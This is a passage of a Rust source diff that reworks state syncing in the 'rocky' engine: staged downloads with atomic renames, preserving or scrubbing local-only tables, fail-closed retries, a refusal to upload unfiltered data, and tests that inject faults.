+    // the remote copy has them stripped, so this is their only source of truth.
+    // A genuinely-absent local file has nothing to preserve (`None`, not an
+    // error); a *present* but unreadable/contended file is FAIL-CLOSED after a
+    // bounded retry (finding 5b) — never silently discarded.
+    let preserved: Option<PathBuf> = if local_path.exists() {
+        Some(snapshot_local_only_tables(local_path, &scratch_dir).await?)
     } else {
         None
     };
 
-    let outcome = match download_state_inner(config, local_path).await {
+    // Download the remote into a STAGING file, never `local_path` — so the local
+    // file is replaced exactly once, by a single atomic rename of a fully-merged
+    // db (finding 5a: no crash window where local-only tables are missing).
+    let staged = unique_scratch_path(&scratch_dir, "download");
+    let outcome = match download_state_inner(config, &staged, &remote_key).await {
         Ok(outcome) => outcome,
         Err(e) => {
-            // Download failed (fail-closed). Drop the snapshot and surface the
-            // error; the local file is whatever the inner path left behind.
-            if let Some(snapshot) = preserved {
-                let _ = std::fs::remove_file(&snapshot);
+            let _ = std::fs::remove_file(&staged);
+            if let Some(p) = &preserved {
+                let _ = std::fs::remove_file(p);
             }
             return Err(e);
         }
     };
 
-    match (outcome, preserved) {
-        (DownloadOutcome::Restored, Some(snapshot)) => {
-            // `local_path` is now the remote replicated tables (local-only
-            // stripped on upload). Splice the preserved local-only tables back
-            // in — a single redb write transaction, atomic at commit. Replicated
-            // tables are left exactly as the remote wrote them.
-            if let Err(e) =
-                copy_named_tables(&snapshot, local_path, crate::state::LOCAL_ONLY_TABLE_NAMES)
-            {
-                warn!(
-                    error = %e,
-                    outcome = "preserve_splice_failed",
-                    "could not restore local-only tables after download; they reset this run"
-                );
-            }
-            let _ = std::fs::remove_file(&snapshot);
+    let result = match outcome {
+        DownloadOutcome::Restored => {
+            // `staged` holds the remote replicated tables. Always overwrite its
+            // local-only tables: from the prior local file when we have it, else
+            // EMPTY — a pre-this-patch remote snapshot (taken when only
+            // `schema_cache` was local-only) can still carry another pod's `jobs`
+            // rows, which must NOT land locally (finding 6a). Then publish
+            // atomically.
+            apply_local_only_and_publish(&staged, preserved.as_deref(), local_path).await
         }
-        (DownloadOutcome::Restored, None) => {
-            // No prior local-only tables to preserve — the restored replicated
-            // state stands alone (local-only tables start empty).
-        }
-        (DownloadOutcome::Absent, Some(snapshot)) => {
-            // No remote object for this key. The pre-download snapshot holds
-            // ONLY the local-only tables, so promoting it to the authoritative
-            // file resets the replicated tables to fresh/empty (finding 6) while
-            // preserving `jobs` / `schema_cache` (finding 7). The rename is
-            // atomic because the snapshot is a sibling of `local_path`.
-            if let Err(e) = std::fs::rename(&snapshot, local_path) {
-                warn!(
-                    error = %e,
-                    outcome = "preserve_promote_failed",
-                    "could not reset replicated tables on an absent remote; \
-                     leaving prior local state in place"
-                );
-                let _ = std::fs::remove_file(&snapshot);
+        DownloadOutcome::Absent => {
+            // No remote object for this key. The replicated tables must reset to
+            // fresh/empty (finding 6) while the local-only tables are preserved.
+            // The pre-download snapshot already holds ONLY the local-only tables,
+            // so publishing it makes the replicated tables fresh and keeps
+            // `jobs` / `schema_cache`. With no prior local file it is a genuine
+            // fresh start — leave `local_path` absent.
+            let _ = std::fs::remove_file(&staged);
+            match preserved.as_deref() {
+                Some(snapshot) => publish_atomically(snapshot, local_path),
+                None => Ok(()),
             }
         }
-        (DownloadOutcome::Absent, None) => {
-            // No prior local file and no remote object — a genuine fresh start.
-        }
-    }
+    };
 
-    Ok(())
+    // Best-effort cleanup — a successful publish already consumed (renamed) its
+    // source file, so these are no-ops on the happy path and only mop up after a
+    // failure.
+    let _ = std::fs::remove_file(&staged);
+    if let Some(p) = &preserved {
+        let _ = std::fs::remove_file(p);
+    }
+    result
 }
 
 /// Directory that should host the sibling scratch file for `local_path`, so an
-/// `Absent`-promotion rename stays on the same filesystem (and is therefore
-/// atomic). Falls back to the current directory when `local_path` has no parent
-/// component.
+/// atomic `rename` publish stays on the same filesystem. Falls back to the
+/// current directory when `local_path` has no parent component.
 fn sibling_scratch_dir(local_path: &Path) -> PathBuf {
     local_path
         .parent()
@@ -369,26 +366,128 @@ fn sibling_scratch_dir(local_path: &Path) -> PathBuf {
         .unwrap_or_else(|| PathBuf::from("."))
 }
 
-/// Build a fresh redb **beside** `local_path` holding ONLY the
-/// [`crate::state::LOCAL_ONLY_TABLE_NAMES`] tables copied from it. Returns the
-/// snapshot path; the caller owns its lifecycle (splice-then-delete, or
-/// promote-by-rename).
-///
-/// The snapshot is a sibling of `local_path` (not under `std::env::temp_dir()`)
-/// precisely so the `Absent`-case promotion can `rename` it into place
-/// atomically on the same filesystem.
-fn snapshot_local_only_tables(local_path: &Path) -> Result<PathBuf, StateSyncError> {
+/// A process-unique scratch path in `dir` (PID + nanos + a monotonic sequence,
+/// so two scratch files taken in the same nanosecond never collide).
+fn unique_scratch_path(dir: &Path, tag: &str) -> PathBuf {
+    use std::sync::atomic::{AtomicU64, Ordering};
+    static SEQ: AtomicU64 = AtomicU64::new(0);
     let nanos = SystemTime::now()
         .duration_since(UNIX_EPOCH)
         .unwrap_or_default()
         .as_nanos();
-    let snapshot = sibling_scratch_dir(local_path).join(format!(
-        ".rocky-state-localonly-{}-{}.redb",
+    let seq = SEQ.fetch_add(1, Ordering::Relaxed);
+    dir.join(format!(
+        ".rocky-state-{tag}-{}-{}-{}.redb",
         std::process::id(),
-        nanos
-    ));
-    copy_named_tables(local_path, &snapshot, crate::state::LOCAL_ONLY_TABLE_NAMES)?;
+        nanos,
+        seq
+    ))
+}
+
+/// Bounded async retry for a synchronous redb file operation. Retries a small,
+/// fixed number of times (dominated in practice by transient open contention — a
+/// concurrent handle briefly holding the file's advisory lock), sleeping briefly
+/// between attempts, then propagates the last error. **Fail-closed: never
+/// converts an error to `Ok`.**
+async fn redb_op_retry<T>(
+    mut op: impl FnMut() -> Result<T, StateSyncError>,
+) -> Result<T, StateSyncError> {
+    const MAX_ATTEMPTS: u32 = 5;
+    let mut last: Option<StateSyncError> = None;
+    for attempt in 1..=MAX_ATTEMPTS {
+        match op() {
+            Ok(v) => return Ok(v),
+            Err(e) => {
+                last = Some(e);
+                if attempt < MAX_ATTEMPTS {
+                    tokio::time::sleep(Duration::from_millis(15 * u64::from(attempt))).await;
+                }
+            }
+        }
+    }
+    Err(last.expect("retry loop runs at least once"))
+}
+
+/// Build a fresh redb **beside** `local_path` holding ONLY the
+/// [`crate::state::LOCAL_ONLY_TABLE_NAMES`] tables copied from it, returning the
+/// snapshot path (the caller owns its lifecycle: splice-into-staged then delete,
+/// or promote-by-rename on `Absent`).
+///
+/// The snapshot lives in `scratch_dir` (a sibling of `local_path`) precisely so
+/// the `Absent`-case promotion can `rename` it into place atomically on the same
+/// filesystem. Fail-closed with a bounded retry (finding 5b).
+async fn snapshot_local_only_tables(
+    local_path: &Path,
+    scratch_dir: &Path,
+) -> Result<PathBuf, StateSyncError> {
+    let snapshot = unique_scratch_path(scratch_dir, "localonly");
+    redb_op_retry(|| {
+        // Start each attempt from a clean file so a half-written scratch from a
+        // failed attempt cannot poison the next one.
+        let _ = std::fs::remove_file(&snapshot);
+        copy_named_tables(local_path, &snapshot, crate::state::LOCAL_ONLY_TABLE_NAMES)
+    })
+    .await
+    .inspect_err(|_| {
+        let _ = std::fs::remove_file(&snapshot);
+    })?;
     Ok(snapshot)
+}
+
+/// Overwrite the [`crate::state::LOCAL_ONLY_TABLE_NAMES`] tables in `staged`
+/// (the freshly-downloaded remote db) — from `preserved` when a prior local file
+/// existed, else EMPTY (finding 6a) — then publish `staged` to `local_path` with
+/// a single atomic `rename`. Fail-closed (finding 5b).
+async fn apply_local_only_and_publish(
+    staged: &Path,
+    preserved: Option<&Path>,
+    local_path: &Path,
+) -> Result<(), StateSyncError> {
+    match preserved {
+        Some(snapshot) => {
+            redb_op_retry(|| {
+                copy_named_tables(snapshot, staged, crate::state::LOCAL_ONLY_TABLE_NAMES)
+            })
+            .await?;
+        }
+        None => {
+            // No prior local file: the remote's local-only rows (if any survived
+            // from a pre-patch upload) must be emptied, not trusted.
+            redb_op_retry(|| clear_named_tables(staged, crate::state::LOCAL_ONLY_TABLE_NAMES))
+                .await?;
+        }
+    }
+    publish_atomically(staged, local_path)
+}
+
+/// Publish `src` to `dst` with a single atomic `rename` (same-filesystem by
+/// construction — `src` is a sibling of `dst`). Fail-closed.
+fn publish_atomically(src: &Path, dst: &Path) -> Result<(), StateSyncError> {
+    std::fs::rename(src, dst).map_err(StateSyncError::Io)
+}
+
+/// Delete the named tables from the redb at `dst` (leaving every other table
+/// untouched), so they reappear empty on the next `StateStore::open`. Used to
+/// scrub any remote-carried local-only rows on a `Restored` download with no
+/// prior local file (finding 6a).
+fn clear_named_tables(dst: &Path, tables: &[&str]) -> Result<(), StateSyncError> {
+    let io = |ctx: &str, e: &dyn std::fmt::Display| {
+        StateSyncError::Io(std::io::Error::other(format!("{ctx}: {e}")))
+    };
+    let db =
+        redb::Database::create(dst).map_err(|e| io("redb create dst for local-only clear", &e))?;
+    let txn = db
+        .begin_write()
+        .map_err(|e| io("redb begin_write for local-only clear", &e))?;
+    for name in tables {
+        let def: redb::TableDefinition<&str, &[u8]> = redb::TableDefinition::new(name);
+        txn.delete_table(def)
+            .map_err(|e| io("redb delete_table for local-only clear", &e))?;
+    }
+    txn.commit()
+        .map_err(|e| io("redb commit for local-only clear", &e))?;
+    drop(db);
+    Ok(())
 }
 
 /// Copy the `tables` from the redb at `src` into the redb at `dst`, replacing
@@ -462,9 +561,16 @@ fn copy_named_tables(src: &Path, dst: &Path, tables: &[&str]) -> Result<(), Stat
 
 /// [`download_state`] retaining the hit/miss [`DownloadOutcome`] the tiered
 /// backend needs to decide whether to fall through to its durable tier.
+///
+/// `dest_path` is where the downloaded bytes are written (a staging file, not
+/// necessarily `local_path`), and `remote_key` is the object key derived ONCE
+/// from the real local path by [`download_state`] — threaded explicitly (like
+/// the upload path) so writing to a differently-named staging file does not
+/// disturb namespaced key resolution.
 async fn download_state_inner(
     config: &StateConfig,
-    local_path: &Path,
+    dest_path: &Path,
+    remote_key: &str,
 ) -> Result<DownloadOutcome, StateSyncError> {
     match config.backend {
         StateBackend::Local => {
@@ -476,20 +582,44 @@ async fn download_state_inner(
                 StateSyncError::MissingConfig("s3".into(), "state.s3_bucket".into())
             })?;
             let prefix = config.s3_prefix.as_deref().unwrap_or(DEFAULT_S3_PREFIX);
-            download_from_object_store("s3", bucket, prefix, local_path, transfer_timeout(config))
-                .await
+            download_from_object_store(
+                "s3",
+                bucket,
+                prefix,
+                dest_path,
+                remote_key,
+                transfer_timeout(config),
+            )
+            .await
         }
         StateBackend::Gcs => {
             let bucket = config.gcs_bucket.as_deref().ok_or_else(|| {
                 StateSyncError::MissingConfig("gcs".into(), "state.gcs_bucket".into())
             })?;
             let prefix = config.gcs_prefix.as_deref().unwrap_or(DEFAULT_GCS_PREFIX);
-            download_from_object_store("gs", bucket, prefix, local_path, transfer_timeout(config))
-                .await
+            download_from_object_store(
+                "gs",
+                bucket,
+                prefix,
+                dest_path,
+                remote_key,
+                transfer_timeout(config),
+            )
+            .await
         }
-        StateBackend::Valkey => download_from_valkey(config, local_path).await,
+        StateBackend::Valkey => download_from_valkey(config, dest_path, remote_key).await,
         StateBackend::Tiered => {
             // Try Valkey first (fast), fall back to S3 (durable).
+            //
+            // KNOWN LIMITATION — tiered cache coherence (finding 3): on the READ
+            // side a genuine Valkey HIT short-circuits the durable S3 tier below.
+            // If a freeze/decision was written to S3 but Valkey holds a STALE
+            // cached snapshot (or one written before the freeze), a policy gate
+            // reading through this path can see the stale Valkey copy and MISS
+            // the freeze. This is NOT fixed here; a correct fix needs
+            // cache-invalidation-on-write (bust/refresh the Valkey key when a
+            // governance ledger is written) or reading the durable tier directly
+            // for policy gates. Tracked as follow-up.
             info!("State backend: tiered (Valkey → S3 fallback)");
             let valkey_config = StateConfig {
                 backend: StateBackend::Valkey,
@@ -502,22 +632,22 @@ async fn download_state_inner(
 
             // Only a genuine Valkey HIT (the leg wrote the file) short-circuits.
             // A MISS (`Absent`) or an error both fall through to the durable S3
-            // tier. Crucially this no longer consults `local_path.exists()`: a
+            // tier. Crucially this no longer consults `dest_path.exists()`: a
             // stale local file left by a previous run must NOT be mistaken for a
             // fresh Valkey hit (which would skip the S3 fallback and resume from
             // stale state).
-            match Box::pin(download_state_inner(&valkey_config, local_path)).await {
+            match Box::pin(download_state_inner(&valkey_config, dest_path, remote_key)).await {
                 Ok(DownloadOutcome::Restored) => {
                     debug!("State restored from Valkey");
                     Ok(DownloadOutcome::Restored)
                 }
                 Ok(DownloadOutcome::Absent) => {
                     debug!("Valkey miss, trying S3");
-                    Box::pin(download_state_inner(&s3_config, local_path)).await
+                    Box::pin(download_state_inner(&s3_config, dest_path, remote_key)).await
                 }
                 Err(e) => {
                     debug!(error = %e, "Valkey error, trying S3");
-                    Box::pin(download_state_inner(&s3_config, local_path)).await
+                    Box::pin(download_state_inner(&s3_config, dest_path, remote_key)).await
                 }
             }
         }
@@ -621,13 +751,17 @@ pub async fn upload_state_with_excluded_tables(
             warn!(
                 error = %e,
                 outcome = "filter_failed",
-                "failed to build replicate-filtered state copy; uploading unfiltered local state"
+                "failed to build replicate-filtered state copy; refusing to upload unfiltered \
+                 local-only data (fail-closed, finding 6b)"
             );
-            // Fall back to the unfiltered local path so a transient filter
-            // failure doesn't block state durability. The filter is a
-            // correctness hedge, not a hard privacy boundary.
-            let result = dispatch_upload(config, local_path, &remote_key).await;
-            return apply_upload_failure_policy(config, result);
+            // Finding 6(b): NEVER fall back to uploading the unfiltered local
+            // file — that would leak the local-only tables (another pod's `jobs`,
+            // this machine's `schema_cache`) into the shared remote snapshot.
+            // Surface the filter failure as an upload error subject to
+            // `on_upload_failure`: `Skip` skips this upload in degraded mode (no
+            // unfiltered upload happens), `Fail` aborts. Either way, no
+            // unfiltered local-only data is ever uploaded.
+            return apply_upload_failure_policy(config, Err(e));
         }
     };
     let result = dispatch_upload(config, &scratch, &remote_key).await;
@@ -771,6 +905,17 @@ async fn dispatch_upload(
             // outer `upload_state` owns that decision for the tiered leg
             // as a whole. The same `remote_key` flows to both legs so a
             // namespaced upload lands at `<ns>.redb` on Valkey and S3 alike.
+            //
+            // KNOWN LIMITATION — tiered cache coherence (finding 3): a Valkey
+            // upload failure here is SWALLOWED (only the durable S3 leg below is
+            // required), even under `on_upload_failure = Fail`. Combined with the
+            // read-side short-circuit (a Valkey HIT skips S3 — see
+            // `download_state_inner`'s Tiered arm), this means a freeze can be
+            // durably written to S3 while a STALE Valkey cache entry survives and
+            // shadows it on the next policy-gate read. This is NOT fixed here; a
+            // correct fix needs cache-invalidation-on-write (bust/refresh the
+            // Valkey key when a governance ledger is written) or reading the
+            // durable tier directly for policy gates. Tracked as follow-up.
             if let Err(e) = Box::pin(dispatch_upload(&valkey_config, local_path, remote_key)).await
             {
                 warn!(error = %e, "Valkey upload failed (non-fatal, S3 is durable)");
@@ -840,14 +985,16 @@ async fn download_from_object_store(
     scheme: &str,
     bucket: &str,
     prefix: &str,
-    local_path: &Path,
+    dest_path: &Path,
+    remote_key: &str,
     timeout: Duration,
 ) -> Result<DownloadOutcome, StateSyncError> {
     let provider = cloud_provider(scheme, bucket, prefix)?;
     // Qualify the object key by schema version so a v7 pod and a v9 pod never
     // collide on the same object — `<prefix>/v9/state.redb`, not
-    // `<prefix>/state.redb`.
-    let key = object_store_state_key(&remote_state_key(local_path));
+    // `<prefix>/state.redb`. `remote_key` is threaded from `download_state` so a
+    // staging `dest_path` does not change which object we read.
+    let key = object_store_state_key(remote_key);
     let span = info_span!(
         "state.download",
         backend = %provider.scheme(),
@@ -856,16 +1003,16 @@ async fn download_from_object_store(
     async {
         info!(
             uri = format!("{scheme}://{bucket}/{prefix}{key}"),
-            local = %local_path.display(),
+            local = %dest_path.display(),
             "downloading state from object store"
         );
 
         with_transfer_timeout(timeout, async {
             match probe_exists(&provider, &key).await {
                 Ok(true) => {
-                    provider.download_file(&key, local_path).await?;
+                    provider.download_file(&key, dest_path).await?;
                     info!(
-                        size = local_path.metadata().map(|m| m.len()).unwrap_or(0),
+                        size = dest_path.metadata().map(|m| m.len()).unwrap_or(0),
                         outcome = "ok",
                         "state restored from object store"
                     );
@@ -978,7 +1125,8 @@ where
 /// `transfer_timeout_seconds` budget the object-store paths use.
 async fn download_from_valkey(
     config: &StateConfig,
-    local_path: &Path,
+    dest_path: &Path,
+    remote_key: &str,
 ) -> Result<DownloadOutcome, StateSyncError> {
     // Test seam: force a Valkey MISS without a live Valkey peer, so the tiered
     // fall-through-to-S3 path (and the "stale local file is not a hit" fix) can
@@ -1000,8 +1148,10 @@ async fn download_from_valkey(
         .to_string();
     // Qualify by schema version: `rocky:state:v9:state.redb`, not
     // `rocky:state:state.redb`, so a v7 reader and a v9 writer never share a key.
-    let key = valkey_state_key(&prefix, &remote_state_key(local_path));
-    let local_path_owned = local_path.to_path_buf();
+    // `remote_key` is threaded from `download_state` so a staging `dest_path`
+    // does not change which key we read.
+    let key = valkey_state_key(&prefix, remote_key);
+    let local_path_owned = dest_path.to_path_buf();
     let timeout = transfer_timeout(config);
 
     let span = info_span!("state.download", backend = "valkey");
@@ -2079,7 +2229,9 @@ mod tests {
             // before URL resolution, proving the fall-through independently.
             ..Default::default()
         };
-        let outcome = download_state_inner(&config, &local).await.unwrap();
+        let outcome = download_state_inner(&config, &local, &remote_state_key(&local))
+            .await
+            .unwrap();
         test_support::clear();
 
         assert_eq!(
@@ -2114,7 +2266,9 @@ mod tests {
             s3_bucket: Some("bucket".into()),
             ..Default::default()
         };
-        let outcome = download_state_inner(&config, &local).await.unwrap();
+        let outcome = download_state_inner(&config, &local, &remote_state_key(&local))
+            .await
+            .unwrap();
         test_support::clear();
 
         assert_eq!(
@@ -2392,6 +2546,125 @@ mod tests {
                 Err(StateSyncError::MissingConfig(..))
             ),
             "the Fail policy the seams force must propagate the upload failure (abort)"
+        );
+    }
+
+    /// Finding 5(b) — fail-closed preserve. A PRESENT but unreadable local file
+    /// (not a redb) cannot be snapshotted, so the local-only tables cannot be
+    /// preserved. The download must FAIL CLOSED (Err) rather than silently
+    /// proceed and discard `jobs` / `schema_cache`; and the prior local file must
+    /// be left untouched (never replaced by remote-only content).
+    #[tokio::test]
+    async fn download_snapshot_failure_fails_closed() {
+        test_support::clear();
+        let dir = TempDir::new().unwrap();
+        let local = dir.path().join(".rocky-state.redb");
+        std::fs::write(&local, b"not a redb file").unwrap();
+
+        // A remote object exists, so the download itself would otherwise succeed.
+        let remote_bytes = build_remote_object_bytes(dir.path(), "remote.fresh");
+        let provider = test_support::install(ObjectStoreProvider::in_memory());
+        let key = object_store_state_key(&remote_state_key(&local));
+        provider.put(&key, Bytes::from(remote_bytes)).await.unwrap();
+
+        let config = StateConfig {
+            backend: StateBackend::S3,
+            s3_bucket: Some("bucket".into()),
+            ..Default::default()
+        };
+        let result = download_state(&config, &local).await;
+        test_support::clear();
+
+        assert!(
+            result.is_err(),
+            "an unreadable local file must fail the local-only snapshot CLOSED, never silently \
+             discard jobs / schema_cache"
+        );
+        assert_eq!(
+            std::fs::read(&local).unwrap(),
+            b"not a redb file",
+            "the prior local file must be left intact on a fail-closed download (never replaced \
+             by remote-only content)"
+        );
+    }
+
+    /// Finding 6(a) — on a `Restored` download with NO prior local file, the
+    /// remote's local-only rows must be SCRUBBED, not trusted. A pre-this-patch
+    /// remote snapshot (uploaded when only `schema_cache` was local-only) can
+    /// carry another pod's `jobs` rows; those must never land locally.
+    #[tokio::test]
+    async fn download_restored_no_local_file_scrubs_remote_local_only() {
+        test_support::clear();
+        let dir = TempDir::new().unwrap();
+        let local = dir.path().join(".rocky-state.redb");
+        assert!(!local.exists(), "precondition: no prior local file");
+
+        // Remote object carrying replicated + LOCAL-ONLY rows (UNstripped, as a
+        // pre-patch upload would have left them).
+        let remote_seed = dir.path().join("remote_seed.redb");
+        seed_local_with_local_only(&remote_seed, "remote.fresh", "job-from-other-pod");
+        let remote_bytes = std::fs::read(&remote_seed).unwrap();
+        let provider = test_support::install(ObjectStoreProvider::in_memory());
+        let key = object_store_state_key(&remote_state_key(&local));
+        provider.put(&key, Bytes::from(remote_bytes)).await.unwrap();
+
+        let config = StateConfig {
+            backend: StateBackend::S3,
+            s3_bucket: Some("bucket".into()),
+            ..Default::default()
+        };
+        download_state(&config, &local)
+            .await
+            .expect("restored download should succeed");
+        test_support::clear();
+
+        let store = StateStore::open(&local).unwrap();
+        assert!(
+            store.get_watermark("remote.fresh").unwrap().is_some(),
+            "the remote's replicated watermark must be present"
+        );
+        assert!(
+            store.list_jobs().unwrap().is_empty(),
+            "a foreign pod's jobs carried by a stale remote must be scrubbed when there is no \
+             prior local file (finding 6a)"
+        );
+        assert!(
+            store.list_schema_cache().unwrap().is_empty(),
+            "a stale remote's schema_cache must be scrubbed when there is no prior local file"
+        );
+    }
+
+    /// Finding 6(b) — a local-only filter failure must NEVER fall back to
+    /// uploading the unfiltered local file: under `Fail` the upload aborts, and
+    /// NO object is written (the local-only rows never leak to the remote).
+    #[tokio::test]
+    async fn upload_filter_failure_does_not_upload_unfiltered() {
+        test_support::clear();
+        let dir = TempDir::new().unwrap();
+        let local = dir.path().join(".rocky-state.redb");
+        // Garbage: `strip_local_only_tables` copies it, then fails to open it as
+        // a redb → the filter fails.
+        std::fs::write(&local, b"not a redb file").unwrap();
+
+        let provider = test_support::install(ObjectStoreProvider::in_memory());
+        let config = StateConfig {
+            backend: StateBackend::S3,
+            s3_bucket: Some("bucket".into()),
+            on_upload_failure: StateUploadFailureMode::Fail,
+            ..Default::default()
+        };
+        let result = upload_state(&config, &local).await;
+        let key = object_store_state_key(&remote_state_key(&local));
+        let uploaded = provider.exists(&key).await.unwrap();
+        test_support::clear();
+
+        assert!(
+            result.is_err(),
+            "a local-only filter failure must abort under Fail, not upload unfiltered"
+        );
+        assert!(
+            !uploaded,
+            "no state object may be uploaded when the local-only filter fails (no leak)"
         );
     }
 }

--- a/engine/crates/rocky-core/src/state_sync.rs
+++ b/engine/crates/rocky-core/src/state_sync.rs
@@ -160,11 +160,37 @@ fn cloud_provider(
 #[cfg(test)]
 mod test_support {
     use super::ObjectStoreProvider;
-    use std::cell::RefCell;
+    use std::cell::{Cell, RefCell};
 
     thread_local! {
         static PROVIDER_OVERRIDE: RefCell<Option<ObjectStoreProvider>> =
             const { RefCell::new(None) };
+        /// One-shot fault: make the next object-store existence probe error.
+        static OBJECT_STORE_EXISTS_FAULT: Cell<bool> = const { Cell::new(false) };
+        /// One-shot fault: make the next Valkey download report a MISS.
+        static VALKEY_MISS_FAULT: Cell<bool> = const { Cell::new(false) };
+    }
+
+    /// Arm a one-shot fault so the next `probe_exists` returns `Err`. Consumed
+    /// (cleared) on read so it can't leak into a later leg/test on this thread.
+    pub(super) fn arm_object_store_exists_fault() {
+        OBJECT_STORE_EXISTS_FAULT.with(|c| c.set(true));
+    }
+
+    /// Read-and-clear the object-store existence fault.
+    pub(super) fn take_object_store_exists_fault() -> bool {
+        OBJECT_STORE_EXISTS_FAULT.with(|c| c.replace(false))
+    }
+
+    /// Arm a one-shot fault so the next `download_from_valkey` reports a MISS
+    /// (`Absent`) without touching a live Valkey peer.
+    pub(super) fn arm_valkey_miss_fault() {
+        VALKEY_MISS_FAULT.with(|c| c.set(true));
+    }
+
+    /// Read-and-clear the Valkey-miss fault.
+    pub(super) fn take_valkey_miss_fault() -> bool {
+        VALKEY_MISS_FAULT.with(|c| c.replace(false))
     }
 
     /// Install `provider` as the next provider [`super::cloud_provider`] hands
@@ -185,10 +211,12 @@ mod test_support {
         PROVIDER_OVERRIDE.with(|cell| cell.borrow().clone())
     }
 
-    /// Clear any installed override so it can't leak into a later test on the
-    /// same thread.
+    /// Clear any installed override and armed faults so nothing leaks into a
+    /// later test on the same worker thread.
     pub(super) fn clear() {
         PROVIDER_OVERRIDE.with(|cell| *cell.borrow_mut() = None);
+        OBJECT_STORE_EXISTS_FAULT.with(|c| c.set(false));
+        VALKEY_MISS_FAULT.with(|c| c.set(false));
     }
 }
 
@@ -197,12 +225,42 @@ fn transfer_timeout(config: &StateConfig) -> Duration {
     Duration::from_secs(config.transfer_timeout_seconds)
 }
 
+/// Outcome of a remote-state download leg.
+///
+/// The distinction is load-bearing for the **tiered** backend: a Valkey
+/// [`Absent`][DownloadOutcome::Absent] (cache miss) must fall through to the
+/// durable S3 tier, whereas a [`Restored`][DownloadOutcome::Restored] (the leg
+/// wrote the local file) short-circuits. Deciding hit-vs-miss on an explicit
+/// return value — rather than the old `local_path.exists()` heuristic — is what
+/// stops a **pre-existing stale local file** from masquerading as a Valkey hit
+/// and starving the S3 fallback.
+#[derive(Debug, Clone, Copy, PartialEq, Eq)]
+enum DownloadOutcome {
+    /// The leg found remote state and wrote it to the local path.
+    Restored,
+    /// No remote state existed for this key (a legit fresh start).
+    Absent,
+}
+
 /// Downloads state from remote storage to a local file before a run.
+///
+/// A missing remote object is **non-fatal** (`Ok(())`, a fresh start). A real
+/// download/existence-check *failure* is **propagated** as `Err` so the caller
+/// can fail closed — see [`download_from_object_store`].
 pub async fn download_state(config: &StateConfig, local_path: &Path) -> Result<(), StateSyncError> {
+    download_state_inner(config, local_path).await.map(|_| ())
+}
+
+/// [`download_state`] retaining the hit/miss [`DownloadOutcome`] the tiered
+/// backend needs to decide whether to fall through to its durable tier.
+async fn download_state_inner(
+    config: &StateConfig,
+    local_path: &Path,
+) -> Result<DownloadOutcome, StateSyncError> {
     match config.backend {
         StateBackend::Local => {
             debug!("State backend: local (no sync needed)");
-            Ok(())
+            Ok(DownloadOutcome::Absent)
         }
         StateBackend::S3 => {
             let bucket = config.s3_bucket.as_deref().ok_or_else(|| {
@@ -222,7 +280,7 @@ pub async fn download_state(config: &StateConfig, local_path: &Path) -> Result<(
         }
         StateBackend::Valkey => download_from_valkey(config, local_path).await,
         StateBackend::Tiered => {
-            // Try Valkey first (fast), fall back to S3 (durable)
+            // Try Valkey first (fast), fall back to S3 (durable).
             info!("State backend: tiered (Valkey → S3 fallback)");
             let valkey_config = StateConfig {
                 backend: StateBackend::Valkey,
@@ -233,14 +291,24 @@ pub async fn download_state(config: &StateConfig, local_path: &Path) -> Result<(
                 ..config.clone()
             };
 
-            match Box::pin(download_state(&valkey_config, local_path)).await {
-                Ok(()) if local_path.exists() => {
+            // Only a genuine Valkey HIT (the leg wrote the file) short-circuits.
+            // A MISS (`Absent`) or an error both fall through to the durable S3
+            // tier. Crucially this no longer consults `local_path.exists()`: a
+            // stale local file left by a previous run must NOT be mistaken for a
+            // fresh Valkey hit (which would skip the S3 fallback and resume from
+            // stale state).
+            match Box::pin(download_state_inner(&valkey_config, local_path)).await {
+                Ok(DownloadOutcome::Restored) => {
                     debug!("State restored from Valkey");
-                    Ok(())
+                    Ok(DownloadOutcome::Restored)
                 }
-                _ => {
-                    debug!("Valkey miss or error, trying S3");
-                    Box::pin(download_state(&s3_config, local_path)).await
+                Ok(DownloadOutcome::Absent) => {
+                    debug!("Valkey miss, trying S3");
+                    Box::pin(download_state_inner(&s3_config, local_path)).await
+                }
+                Err(e) => {
+                    debug!(error = %e, "Valkey error, trying S3");
+                    Box::pin(download_state_inner(&s3_config, local_path)).await
                 }
             }
         }
@@ -528,17 +596,44 @@ fn apply_upload_failure_policy(
     }
 }
 
+/// Existence probe for a remote state object, isolated behind a test seam.
+///
+/// Production behaviour is exactly `provider.exists(key)`. Under `#[cfg(test)]`
+/// a fault can be armed (see [`test_support::arm_object_store_exists_fault`]) so
+/// a test can drive the failure arm of [`download_from_object_store`]
+/// deterministically without a live/flaky cloud endpoint — the in-memory
+/// provider never errors on `exists`, so this is the only in-crate way to prove
+/// the fail-closed propagation is RED before the fix and GREEN after it.
+async fn probe_exists(provider: &ObjectStoreProvider, key: &str) -> Result<bool, StateSyncError> {
+    #[cfg(test)]
+    if test_support::take_object_store_exists_fault() {
+        return Err(StateSyncError::S3Download(
+            "injected existence-check failure (test seam)".into(),
+        ));
+    }
+    provider.exists(key).await.map_err(StateSyncError::from)
+}
+
 /// Download `STATE_FILE` from an object store rooted at `<scheme>://<bucket>/<prefix>`.
 ///
-/// If the object doesn't exist, logs a message and returns Ok — rocky will
-/// start with a fresh state file.
+/// Returns [`DownloadOutcome::Restored`] when the object existed and was written
+/// locally, and [`DownloadOutcome::Absent`] when no object exists (a legit fresh
+/// start — non-fatal by design).
+///
+/// A *failed* existence check (network / auth / backend error) is **propagated
+/// as `Err`**, never swallowed. Previously this arm logged and returned `Ok`,
+/// which made a genuine download failure indistinguishable from an
+/// authoritative "no remote state yet": the caller (`rocky run`) would then
+/// treat a possibly-populated remote ledger as empty and lose its fail-closed
+/// signal. The absent case (`Ok(false)`) still returns `Absent` — a real fresh
+/// start must stay non-fatal.
 async fn download_from_object_store(
     scheme: &str,
     bucket: &str,
     prefix: &str,
     local_path: &Path,
     timeout: Duration,
-) -> Result<(), StateSyncError> {
+) -> Result<DownloadOutcome, StateSyncError> {
     let provider = cloud_provider(scheme, bucket, prefix)?;
     // Qualify the object key by schema version so a v7 pod and a v9 pod never
     // collide on the same object — `<prefix>/v9/state.redb`, not
@@ -557,7 +652,7 @@ async fn download_from_object_store(
         );
 
         with_transfer_timeout(timeout, async {
-            match provider.exists(&key).await {
+            match probe_exists(&provider, &key).await {
                 Ok(true) => {
                     provider.download_file(&key, local_path).await?;
                     info!(
@@ -565,15 +660,19 @@ async fn download_from_object_store(
                         outcome = "ok",
                         "state restored from object store"
                     );
-                    Ok(())
+                    Ok(DownloadOutcome::Restored)
                 }
                 Ok(false) => {
                     info!(outcome = "absent", "No existing state in object store — starting fresh");
-                    Ok(())
+                    Ok(DownloadOutcome::Absent)
                 }
+                // Fail closed: a real existence-check failure is NOT an
+                // authoritative "no remote state". Propagate so the caller can
